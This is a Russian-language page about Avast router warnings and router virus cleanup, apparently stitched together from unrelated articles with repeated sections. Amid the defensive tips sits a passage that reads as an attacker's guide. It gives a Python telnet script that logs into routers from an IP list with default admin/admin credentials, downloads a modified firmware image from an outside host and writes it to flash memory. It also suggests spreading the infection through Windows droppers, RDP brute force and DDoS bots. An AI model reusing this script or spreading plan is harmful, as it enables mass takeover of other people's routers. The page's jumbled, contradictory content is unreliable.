Avast пишет что роутер уязвим, инфицирован, настроен неправильно

Ответы на вопросы

Можно ли исправить проблему с роутером самостоятельно?

В зависимости от проблемы, иногда можно исправить самостоятельно. Но в большинстве случаев необходима помощь специалиста. Неправильные настройки могут привести к серьезным последствиям, так что если вы не уверены в своих способностях, лучше обратиться к профессиональным службам.

Как я могу убедиться, что мой роутер настроен правильно?

Настройки роутера зависят от модели и производителя, но есть несколько стандартных шагов, которые можно предпринять. Войдите в настройки роутера и проверьте, что вы используете безопасную сеть Wi-Fi с защитой WPA2. Также убедитесь, что включен фаервол, который защищает вашу сеть от внешних атак. Если вы сомневаетесь, лучше обратиться к профессионалам.

Какие могут быть последствия, если роутер настроен неправильно?

Неправильные настройки роутера могут привести к серьезным последствиям. Ваша сеть может быть уязвимой к внешним атакам, а злоумышленники могут получить доступ к вашим личным данным. Кроме того, неправильные настройки могут привести к сбоям в работе сети.

Что делать, если Avast сообщает о инфицировании роутера?

Avast может обнаруживать проблемы с вашим роутером и сообщать об инфицировании. Если вы получили такое сообщение, то нужно принять незамедлительные меры. Сперва можете попробовать перезагрузить роутер, после чего проверить настройки и обновить прошивку. Если проблема не решается, обратитесь к профессиональному специалисту.

Какую роль играют настройки безопасности Wi-Fi?

Настройки безопасности Wi-Fi играют важную роль в защите вашей сети. Если вы используете небезопасные методы шифрования, злоумышленник может легко получить доступ к вашей сети и украсть ваши персональные данные. Используйте WPA2, чтобы защитить свою сеть, а также длинные пароли, которые невозможно перебрать.

Как я могу проверить, обновлен ли мой роутер до последней версии прошивки?

Войдите в настройки роутера и найдите раздел «обновление прошивки». Если доступна новая версия, то вы можете скачать ее и установить. Многие роутеры также позволяют настроить автоматическое обновление прошивки, чтобы быть всегда в курсе последних обновлений.

Могут ли настройки роутера повлиять на скорость интернета?

Да, некоторые настройки роутера могут повлиять на скорость интернета. Например, если вы используете устаревший протокол Wi-Fi, это может привести к замедлению скорости. Также настройки фаервола могут замедлять работу интернета. Если вы испытываете проблемы со скоростью интернета, проверьте настройки роутера и обратитесь к провайдеру интернет-услуг.

Может ли злоумышленник получить доступ к моей сети, если я использую WPA-шифрование?

Если вы используете WPA-шифрование, то ваша сеть должна быть защищена от большинства угроз. Но если злоумышленник получил доступ к вашему паролю, то он может получить доступ к сети

Поэтому важно использовать длинный пароль, который невозможно перебрать методом перебора

Какую роль играет фаервол в безопасности роутера?

Фаервол играет важную роль в защите роутера от внешних атак. Он блокирует нежелательный трафик и защищает от хакерских атак. Если фаервол отключен, ваша сеть становится уязвимой к внешним угрозам

Поэтому важно всегда держать фаервол включенным

Как защитить роутер от вирусов

1. Обновить прошивку до последней

Зайдите на сайт производителя, введите свою модель, и скачайте самую свежую прошивку. Читайте на примере оборудования TP-Link.

Не все маршрутизаторы позволяют изменить логин. Но если вы установите сложный пароль, этого будет достаточно.

4. Изменить IP-адрес роутера в локальной сети

Даже не сомневайтесь, что первым делом вирус-взломщик роутеров будет обращаться к самым популярным адресам: 192.168.0.1 и 192.168.1.1. Поэтому мы вам советуем изменить третий и четвертый октет локального IP-адреса в настройках LAN. Задайте например:

192.168.83.254

После этого все устройства в сети будут получать IP из диапазона 192.168.83.*

6. Не сохранять пароли в браузере

Думаю, вы в состоянии запомнить пароль от веб-интерфейса маршрутизатора. Или как минимум его записать на бумаге.

В свете участившихся случаев подмены DNS вредоносными программами на устройствах пользователей интернет, возникает вопрос безопасности Wi-Fi роутеров. Как проверить роутер на вирусы? Как удалить вирус в роутере? Вопрос сложный и простой одновременно. Решение есть!

Сам вирус на большинство современных роутеров записать себя сам не может из-за малого места в памяти самого роутера, но может зомбировать роутер для участия в ботнете. Как правило, это ботнет для атаки на различные сервера, или для перенаправления и анализа потоков информации уходящей от вас в интернет.

Ваши пароли и личная переписка могут попасть в руки злоумышленников!

Это необходимо исправить как можно быстрее.

Сброс настроек роутера

Прошивка роутера

Повторная настройка

Сброс настроек роутера

Сбросить настройки роутера вы можете нажатием кнопки ресет (reset). Обычно эту кнопку располагают сзади роутера, там, где и порты LAN. Обычно кнопка утоплена в дырочке, чтобы избежать случайного нажатия, так что придётся использовать зубочистку. Это удалит изменённые вирусом настройки роутере, и установит на их место заводские. Должен предупредить вас, что, если вы не умеете настраивать роутер, то и сбрасывать его настройки вам не стоит !

Прошивка роутера

Иногда вирус “заливает” изменённую прошивку на роутер. Удалить с роутера вирусную прошивку, можно прошив роутер заново.

Соедините компьютер с роутером LAN кабелем. LAN кабель идёт в комплекте к любому роутеру. Или через Wi-Fi, еслинет возможности кабельного соединения. Лучше подключаться кабелем! Беспроводное подключение считается нестабильным и не подходит для прошивки роутера.

После того как мы подсоединились к роутеру, открываем браузер (Chrome, Opera, Mozilla, IE) и вводим в адресную строку адрес роутера ASUS, у асусов это 192.168.1.1, на открывшейся странице надо будет ввести логин и пароль для входа в настройки роутера. Логин: admin, Пароль: admin. Если логин и пароль не подходят, то спрашивайте у того кто настроил вам роутер, возможно он их сменил.

Скачайте прошивку с сайта производителя и выберите прошивку на диске с помошью страницы настроек роутера. Для абсолютного большинства роутеров этапы прошивки одинаковы.

До недавнего времени я даже не знал, что роутер Avast пугает своих пользователей “страшными” предупреждениями относительно их роутеров. Как оказалось, антивирус Avast проводит проверку Wi-Fi роутеров. Он выдает результаты, что маршрутизатор настроен неправильно, устройство уязвимо для атак, или вообще, что роутер заражен и инфицирован, а злоумышленники уже перехватили DNS-адреса и успешно переправляют вас на вредоносные сайты, крадут данные кредитных карт и вообще все очень плохо. Все эти предупреждения конечно же приправлены опасным красным цветом и запутанными инструкциями, в которых даже хороший специалист без пива не разберется. Я не говорю уже об обычных пользователях. Вот так выглядят найденные проблемы на роутере D-Link DIR-615:

Устройство уязвимо для атак:

Из вариантов решения конечно же обновление прошивки роутера. Ибо что еще Так же Avast может выдавать сообщение, что ваш роутер защищен слабым паролем, или роутер не защищен от взлома.

В отдельных случаях можно увидеть сообщение, что ваш роутер инфицирован, и соединения перенаправляются на вредоносный сервер. Антивирус Avast объясняет это тем, что ваш роутер был взломан, и в нем были изменены DNS-адреса на вредоносные. И там же предоставлены инструкции по решению этой проблемы для разных роутеров: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys/Cisco, NETGEAR, Sagem/Sagemco.

Если коротко, то все эти рекомендации направлены на проверку DNS-адресов, и служб связанных с DNS. Через которые злоумышленники могут сменить DNS на вашем роутере и перенаправлять вас на свои вредоносные сайты. Там есть подробные инструкции как все проверить на маршрутизаторах разных производителей.

Некоторые идеи распространения

Свой прокси\сокс на чужом роутере – это здорово. Как, собственно, и спамящий
по всем протоколам маршрутизатор. Это тебе не компьютер с Windows, которую
переставляют каждый месяц:). Роутеры часто не меняют и не перепрошивают. Да и
кому кроме нас взбредет в голову сама идея инфицирования роутера?

Не забывай, под контролем у нас весь трафик от пользователя/сети. На более
мощных роутерах уже и DDOS-бота возможно повесить. Спрятать файл/скрыть процесс,
перехватывать запись в mtd блоки исключив затирание нашей программы – все, что
угодно!

Допустим, ты собрался взяться за написание серьезной программы для роутера.
Важна очень хорошая отладка, наверняка придется кучу раз
переписывать/восстанавливать образы… Это очень грустная перспектива. Даже руки
немного опускаются, если еще и учесть, что ресурс перезаписи у Flash-памяти
невелик (подробнее в документации к микросхеме памяти), и есть перспектива
угробить ее. Но выход есть! Qemu может эмулировать AR7! Ты представляешь, какие
это дает возможности и безграничное удобство? Теперь нам ничего не мешает
написать что-то невероятно классное!

Итак. Ты написал программу, проверил на своем или 1-2 чужих роутерах, но ведь
еще вся сеть впереди, вручную заражать муторно, на 10-м роутере уже начинаешь
проклинать весь мир, и плывет в глазах от верениц «cat» и «mtd». Напишем
программу для автоматизации этих рутинных действий. Я выбрал язык python.

План работы таков:

• составляем список роутеров, например, с помощью nmap;
• скрипт должен брать из списка по порядку IP-адреса, заходить через
  telnet со стандартным логином\паролем;
• далее те самые действия: закачиваем модифицированный образ,
  перезаписываем, перезагружаемся.

#!/usr/bin/env python
#Encode=UTF-8

import telnetlib,time

SERVER=»http://anyhost.com/fs.image»

for addr in open(«iplist.txt»):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until(«login:»)
time.sleep(5)
telnet.write(«admin\n»)
telnet.read_until(«Password:»)
telnet.write(«admin\n»)
telnet.read_until(«#»)
telnet.write(«cd /var && wget » + SERVER)
telnet.read_until(«#»)
telnet.write(«cat fs.image > /dev/mtdblock/0»)
telnet.read_until(«#»)
telnet.write(«reboot»)
telnet.close()

Логика работы скрипта очень далека от идеала, сейчас поясню, почему. Для
начала следует проверять версию прошивки/ядра и модель роутера, ибо могут быть
серьезные отличия в работе. Далее, вместо заготовок прошивок следует выкачивать
образ файловой системы с роутера, распаковывать, модифицировать и отправлять
обратно. Это исключит проблемы, возникающие с совместимостью в разных
моделях/версиях прошивок, ведь устойчивость работы для тебя – самое главное.
Также вирус может иметь функции червя, и, если есть желание, всегда можно
прикрутить к нему сканер сети, брутфорс для RDP и подобные фишки.

Есть еще один замечательный способ распространения. Ничего не мешает написать
программу под Windows, которая будет иметь при себе (либо скачивать со своего
сервера) образ файловой системы и заражать им роутер, если он присутствует.
Распространять эту программу всеми «стандартными» способами: съемные накопители,
эксплойты под программы, заражение других программ… Комбинируя эти способы,
можно устроить серьезную пандемию. Ты только представь себе эту картину – ведь
подобные устройства распространены повсеместно.

Защита сетевого оборудования от вирусов

Для защиты своего маршрутизатора от заражения можно воспользоваться следующими рекомендациями:

• Сделать обновление прошивки до последней версии. Посетите сайт изготовителя, впишите в поиск свою модель и загрузите самую последнюю прошивку.
• Установить многозначное значение пароля на веб-интерфейс. Не во всех роутерах можно менять логин. Однако, если вы поставите сложный пароль, взломать веб-интерфейс уже будет непросто.
• Установить оффлайн вход в настройки роутера.
• Поменять IP-адрес маршрутизатора в локальном доступе. В процессе взлома вирус сразу будет обращаться к таким адресам, как 192.168.0.1 и 192.168.1.1. Исходя из этого, лучше поменять третий и четвертый октет IP-адреса локальной сети.
• Поставить надежную антивирусную программу на ПК. Если вирус сперва попытается проникнуть в компьютер, он будет сразу удален, что не позволит ему нанести вред маршрутизатору.
• Не храните пароли в браузере.

Как видите, проверить роутер на вирусы и почистить его несложно. Но лучше следовать простым советам по профилактике заражения. Но если уж такое случилось, вы знаете, что нужно делать.

В свете участившихся случаев подмены DNS вредоносными программами на устройствах пользователей интернет, возникает вопрос безопасности Wi-Fi роутеров. Как проверить роутер на вирусы? Как удалить вирус в роутере? Вопрос сложный и простой одновременно. Решение есть!

Сам вирус на большинство современных роутеров записать себя сам не может из-за малого места в памяти самого роутера, но может зомбировать роутер для участия в ботнете. Как правило, это ботнет для атаки на различные сервера, или для перенаправления и анализа потоков информации уходящей от вас в интернет.

Ваши пароли и личная переписка могут попасть в руки злоумышленников!

Это необходимо исправить как можно быстрее.

Сброс настроек роутера

Прошивка роутера

Повторная настройка

Сброс настроек роутера

Сбросить настройки роутера вы можете нажатием кнопки ресет (reset). Обычно эту кнопку располагают сзади роутера, там, где и порты LAN. Обычно кнопка утоплена в дырочке, чтобы избежать случайного нажатия, так что придётся использовать зубочистку. Это удалит изменённые вирусом настройки роутере, и установит на их место заводские. Должен предупредить вас, что, если вы не умеете настраивать роутер, то и сбрасывать
его настройки вам не стоит
!

Прошивка роутера

Иногда вирус «заливает» изменённую прошивку на роутер. Удалить с роутера вирусную прошивку, можно прошив роутер заново.

Соедините компьютер с роутером LAN кабелем. LAN кабель идёт в комплекте к любому роутеру. Или через Wi-Fi, еслинет возможности кабельного соединения. Лучше подключаться кабелем! Беспроводное подключение считается нестабильным и не подходит для прошивки роутера.

После того как мы подсоединились к роутеру, открываем браузер (Chrome, Opera, Mozilla, IE) и вводим в адресную строку адрес роутера ASUS, у асусов это 192.168.1.1, на открывшейся странице надо будет ввести логин и пароль для входа в настройки роутера. Логин: admin, Пароль: admin. Если логин и пароль не подходят, то спрашивайте у того кто настроил вам роутер, возможно он их сменил.

Скачайте прошивку с сайта производителя и выберите прошивку на диске с помошью страницы настроек роутера. Для абсолютного большинства роутеров этапы прошивки одинаковы.

Проверка роутера

Перед тем как чистить роутер от вирусов, необходимо проверить, есть ли они на нём. Чтобы узнать результат, необходимо воспользоваться интернетом напрямую через компьютер. То есть вытащите WLAN-кабель или модем из роутера и вставьте его в порт компьютера, а после выполните следующие действия:

Если у вас возникают проблемы со скоростью, то выполните следующие три шага.

1. Проверьте скорость интернета. Это нужно сделать, чтобы в будущем узнать, одинакова ли скорость при использовании сети напрямую и через роутер. Например, можно скачать какой-нибудь файл или воспользоваться специальным онлайн-сервисом Speedtest.

   Сканируем скорость интернета через сайт Speedtest

2. Чтобы более точно определить качество сигнала, необходимо узнать показатель пинга. Пинг — это время, за которое сигнал отправляется с вашего устройства, доходит до сервера и возвращается обратно. Естественно, чем он больше, тем хуже для вас. Откройте командную строку, пропишите команду ping ip и выполните её. IP — адрес вашего соединения, по умолчанию обычно используется 192.168.0.1, но может отличаться. Запомните полученный результат. Нормальное значение пинга до 40 мс — отличный показатель, 40–110 мс — нормальное среднее значение, больше 110 мс — стоит задуматься о перенастройке сети, улучшении сигнала или смене провайдера.

   Выполняем команду ping ip

3. После списка отправленных пакетов вы увидите статистику. Вас интересует строчка «Пакеты», в ней подсчитано, сколько пакетов отправлено, потеряно, выполнено. Если количество потерянных пакетов превышает 5%, необходимо узнавать, в чём проблема. Если большое количество пакетов не будет доходить до сервера или возвращаться, это сильно скажется на скорости интернета.

   Смотрим, какой процент пакетов потерян

После того как вы опишите все вышеописанные действия, получите подробную информацию о пинге, количестве утерянных пакетов и скорости интернета, снова подключите WLAN-кабель или модем к роутеру и проверьте все те же показатели при подключении через Wi-Fi. Если параметры будут находиться примерно на одном уровне, то проблема кроется не в роутере, возможно, причина на стороне оператора. В противном случае, если проблемы с интернетом возникают только при использовании его через роутер, необходимо выполнить сброс настроек и чистку от вирусов.

Сверхскопление массивных дыр

Беда редко приходит одна: активация WPS автоматически приводит к включению UPnP. Вдобавок используемый в WPS стандартный пин-код или ключ предварительной аутентификации сводит на нет всю криптографическую защиту уровня WPA2-PSK. Из-за ошибок в прошивке WPS часто остается включен даже после его отключения через веб-интерфейс. Узнать об этом можно с помощью Wi-Fi-сканера — например, бесплатного приложения Wifi Analyzer для смартфонов с ОС Android. Если уязвимые сервисы используются самим администратором, то отказаться от них не получится. Хорошо, если роутер позволяет хоть как-то их обезопасить. Например, не принимать команды на порт WAN или задать конкретный IP-адрес для использования Telnet. Иногда возможности настроить или просто отключить опасный сервис в веб-интерфейсе просто нет и закрыть дыру стандартными средствами невозможно. Единственный выход в этом случае — искать новую или альтернативную прошивку с расширенным набором функций.

А началось все…

Что-то я отвлекся. Итак, все началось с того, как однажды зависла эта самая
железка, точнее, она предательски оборвала соединение с интернетом и никак не
хотела его восстанавливать. При этом находилась она далеко, физического доступа
к ней не было (впрочем, что-то я заврался – мне просто было лень встать с дивана
с перезагрузить роутер:)), Web-интерфейс не отзывался, но я вспомнил, что на
этой штуковине должен быть telnet или ssh. Заходить в зону администрирования я
ранее не пробовал и опрометчиво не менял пароль к моей учетной записи (как
оказалось позже, очень зря, ведь по дефолту он «admin:admin»). Итак, я
попробовал SSH, и он работал!

Как гром среди ясного неба! BusyBox! Никогда не задумывался о том, под чьим
управлением находится этот роутер, оказывается – GNU/Linux! Мне стало жутко
интересно, как же здесь все работает, и, мысленно благодаря лень и случай, я
пустился в исследование.

Способы восстановления в случае неудачи

Прежде чем прошивать роутер более серьезными «поделками» следует узнать, как
же действовать в критических случаях, когда маршрутизатор отказывается
загружаться. Безвыходных ситуаций нет. На помощь приходит ADAM2 FTP-сервер. Для
начала следует запустить FTP-клиент на IP-адрес ADAM2, который можно подглядеть
в /proc/ticfg/env (параметр my_ipaddress).

$ ftp 192.168.1.199
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.

Для наглядности можно включить отладочный режим, тогда будут выводиться вся
информация и все ответы FTP:

Логин/пароль – adam2/adam2. Процесс перепрошивки очень прост. Для начала
переводим сессию FTP в бинарный режим:

ftp> quote MEDIA FLSH

Теперь отправляем, например, образ файловой системы и указываем место
назначения:

ftp> put fs.img «fs.img mtd0»

Ждем окончания записи, перезагружаем роутер, выходим из сессии:

ftp> quote REBOOT
ftp> quit

Все! Как видишь, нет ничего сложного, теперь если что-то пойдет не так, ты
всегда можешь исправить ситуацию.

Для удобства работы, следует дать нормальный IP-адрес, включить
автоматическую загрузку (чтобы с reset’ом не плясать) и немного увеличить время
ожидания подключения перед загрузкой ядра. Все эти параметры хранятся в
переменных окружения, есть специальные команды FTP ADAM2: GETENV и SETENV (для
получения и установки переменной соответственно). В сессии FTP вводим следующие
команды:

ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> quote REBOOT
ftp> quit

Роутер перезагружается и можно зайти на ADAM2 по 192.168.1.1:21. Если
появится желание перепрошить образ ядра, и ядро откажется загружаться, FTP
запустится сам. Перед прошивкой модифицированными образами обязательно следует
сохранить текущие для восстановления. Вообще, сменить переменные окружения можно
и через /proc/ticfg/env, мне просто захотелось рассказать больше о работе с FTP.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

А проверить изменения можно так:

# cat /proc/ticfg/env | grep my_ipaddress

Что делать, если ты захотел попробовать перепрошить загрузчик, и как
действовать в случае неудачи? Либо роутер по каким-то причинам не запускается, и
нет доступа к ADAM2? Выход есть – JTAG, а точнее, в этом чипе присутствует EJTAG
(расширенная версия). Это интерфейс для внутрисхемной отладки\программирования.

Для подключения к этому интерфейсу нам понадобится LPT-порт компьютера,
разъемы и 4 резистора. Схема простейшая.

Спешу заметить, что прошивка через JTAG – дело не быстрое, займет достаточно
много времени. Так что использовать стоит только для восстановления загрузчика,
если даже он не работает. Для общения по JTAG следует использовать специальную
программу, например UrJTAG. Ниже приведен пример работы по этому интерфейсу.
Установка связи:

jtag> cable parallel 0x378 DLC5
jtag> detect

Обнаружение Flash-памяти:

jtag> detectflash 0x30000000 1

Чтение Flash-памяти:

jtag> readmem 0x30000000 0x400000 fullflash.img

Запись в память (загрузчика):

jtag> flashmem 0x30000000 adam2.img

Полезно также знать о UART-интерфейсе (ранее я обещал о нем рассказать). В
UART_A отчитывается, то есть ведет лог загрузчик (на ранней стадии загрузки с
ним можно и пообщаться) и ядро. При написании модифицированных ядер это
незаменимо для отладки. UART — Universal Asynchronous Receiver/Transmitter
(универсальный асинхронный приемопередатчик) почти всегда присутствует на
микроконтроллерах.

Схема адаптера очень проста. Базируется лишь на одной микросхеме –
преобразователе уровней TTL: MAX232 для COM и FT232R для USB. Микросхемы
достаточно распространены и проблем с покупкой не будет.

Схема собирается на макетной плате (которую спокойно можно поместить в корпус
разъема COM-порта) за 20 минут и приносит море пользы. Например, при отладке
ядра это абсолютно незаменимое решение. А если с электроникой туго? Выходом
являются USB-шнуры для старых телефонов, на них как раз стоит преобразователь
UART — USB.

Сеть без доступа к интернету

Да, это самая популярная проблема. Я писал о ней в статье . Кстати статья тоже не менее популярная:).

Почему возникает эта проблема и почему она самая популярная?

Возникает она как правило из-за точно, что при настройке маршрутизатора неправильно указывают параметры, которые предоставляет провайдер
.

Так же, обратите внимание на привязку по MAC адресу. Если провайдер ее делает, то не забудьте клонировать MAC адрес в настройках маршрутизатора

Только клонируйте с того компьютера к которому был привязан интернет.

И еще, в свойствах Беспроводное сетевое соединение
, или Подключение по локальной сети
в Протокол интернета версии 4 (TCP/IPv4)
нужно установить получать IP и DNS автоматически.

Вот такая самая распространенная ошибка и ее решение.

И еще один важный момент

Если у Вас провайдер, для которого до установки роутера было создано на компьютере специальное соединение, а после установки роутера интернет работает только на одном компьютере, или работает, пока этот компьютер включен, то тут нужно кое-что прояснить.

Понимаете, маршрутизатор сам должен устанавливать соединение с интернетом, а не компьютер. На компьютере нужно удалить созданное ранее подключение. А в свойствах сетевого адаптера выставить получать IP и DNS автоматически.

Я по этому вопросу тоже статью писал, .

Послесловие

Не знаю, насколько полезной для Вас была эта статья, но надеюсь, что время я потратил не зря.

Перед настройкой маршрутизатора главное понять как он работает и указать правильные настройки, которые Вам выдал провайдер при подключении к интернету. Если Вы не знаете какие параметры указывать и что выбирать, то просто позвоните к провайдеру и спросите.

Вредоносные программы — угроза для компьютера

Безусловно, вредоносные программы наиболее часто упоминались среди всех сетевых опасностей. И не без оснований — в конце концов, это самая популярная „форма действий“ среди людей, желающих навредить другим пользователям.

Правильная защита требует постоянного обновления антивирусной программой базы данных
— новые типы вредоносных программ, возникают практически каждый день. От обычных удаленных средств управления оборудования, передающих контроль над компьютером другому человеку, и заканчивая бесчисленным множеством вирусов и троянский программ. А к этому следует добавить черви, руткиты или клавиатурных шпионов, которых часто невозможно обнаружить традиционными методами.

Установка средств разработки и компиляция прошивки

Прошивки роутеров D-Link (да и всех остальных, основанных на GNU/Linux)
распространяются под лицензией GPL, получить их можно на официальном
FTP-сервере. На самом деле можно выбрать любую из списка предложенных прошивок,
они одинаковы (касательно T-серии). В поставке – исходники ядра, окружения,
необходимых инструментов и toolchain для разработки/компиляции существующих
программ. Его следует распаковать в корень и добавить в переменную окружения
PATH путь до bin-директории toolchain`a:

$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/

Теперь, чтобы скомпилировать свою собственную прошивку, заходим в директорию
с исходными кодами и выполняем этот самый make.

$ cd DSL/TYLinuxV3/src && make

Будет заданно множество вопросов о включении поддержки устройств (лучше
ответить на них положительно). По окончании компиляции в директории TYLinuxV3/images
будут созданы образы прошивки. Также можно запустить скрипт, одноименный с твоей
моделью из директории /TYLinuxV3/src/scripts.

Пару слов о передаче файлов между роутером и компьютером. Самый первый
способ, который я применил – возможность передачи файлов по протоколу SSH,
используя для этого программу scp. Но чуть позже я узнал, что mc (Midnight
Commander) также имеет возможность соединяться по SSH (Panel -> Shell connection).
Как вариант, можно поднять на своем рабочем месте Web- или FTP-сервер. Позже я
отдал предпочтение Web-серверу, ибо работает он наиболее резво. Установил я
thttpd, маленький и быстрый, как и на роутере. Запускаем у себя и стягиваем на
роутер файл, предварительно перейдя в директорию /var (она, как говорилось
ранее, доступна для записи).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# wget http://192.168.1.2/file

Чтобы стянуть файл с роутера, можно также поднять Web-server:

# thttpd -g -d /var -u root -p 8080

Обрати внимание, если ты хочешь скачать с роутера исполняемый файл, следует
убрать права на запуск. При скачивании большого количества файлов с роутера
лучше использовать mc, не нужно будет предварительно копировать файлы в /var и
убирать права, а после – удалять эти файлы для освобождения места

В общем, дело
вкуса, выбирай любой вариант, который тебе удобен.